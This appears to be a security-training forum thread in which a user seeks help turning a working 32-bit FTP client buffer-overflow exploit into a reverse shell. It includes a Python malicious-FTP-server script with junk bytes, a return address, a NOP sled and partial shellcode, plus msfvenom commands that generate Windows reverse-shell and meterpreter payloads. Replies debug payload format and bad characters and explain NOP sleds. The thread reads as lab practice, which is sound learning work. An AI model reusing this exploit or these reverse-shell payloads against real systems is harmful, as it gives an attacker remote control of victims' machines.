32Bit FTP Buffer Overflow attack

, ,

Hi All,

I was able to pop calc.exe on 32bit buffer overflow but i cant get a reverse shell. Can anyone help?


msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f python --var-name payload EXITFUNC=thread -b "\x00"

Python Script:


import socket, sys

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sock.bind(("", 21))
print "[+] Listening to on FTP 21"
c, addr = sock.accept()
print "[+] Connection accepted from: %s" % (addr[0])

buffer = "A" * 989
buffer += "\xb9\xc2\xcc\x75"                         
buffer += "\x90" *32

payload = ""
payload += b"\xbf\xfa\x6f\x7e\xe9\xd9\xcc\xd9\x74\x24\xf4\x5d"
payload += b"\x2b\xc9\xb1\x52\x83\xed\xfc\x31\x7d\x0e\x03\x87"

buffer += payload

c.send("220 " + buffer + "\r\n")
print("[+] Client exploited !! ")

Original post by Clarence

You are using a python version to get a reverse shell… are you sure you can use a python?

I would try something like this:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

Is your listener correct?

Original reply by StefanWAustin

I’m assuming you’ve corrected your buffer and payload as they are two (duplicate) instances of adding junk bytes, jump command and shellcode (you’ve done the whole thing twice)

This here:


buffer= …





you just need one line for junk bytes, one for the JMP, and one for shellcode. With each new line use += as this adds onto the end of the string.

Payload += 7

is the equivalent of

Payload = payload + 7


Also the msfvenom payload should just be shellcode, not with an executable output… also assuming you’ve got that straightened out because you mentioned you’ve got calc.exe running, however I’ll put this up anyway

That’s just msfvenom -p windows/shell_reverse_tcp LHOST=… LPORT=… -f c -b “/x00”

-f c is to generate shellcode in C

-f exe is to format as exe

-b “/x00” is to identify bad characters, /x00 by default is no good. You may need to add more. If i recall correctly what you do is google bad characters pypi.org and copy their list of badchars, and add these to your junk bytes. Review the stack to look for any missing numbers/letters in the sequence of 0-9 and A-Z that will be written to the stack as a result of a buffer overflow

I.E. identify a missing number/letter and append it to the badchars command i.e “/x00/xAF” etc

Original reply by m1ck3yb33

hey mate,

i had the same problem. I followed this post and things cleared up:


also add a NOP sled to the start of your shellcode:


Original reply by m1ck3yb33

Hi All

Why do we need to add the NOP ?

Why It cannot execute our shellcode directly without adding NOP ?

Original reply by luisqp66

The reason the attacker uses the NOP sled is to make the target address bigger: the code can jump anywhere in the sled, instead of exactly at the beginning of the injected code.

So you don’t need to add it always, but if you think your code should work, adding few NOPs just to be sure is the least you can do.

Original reply by jahoda.radek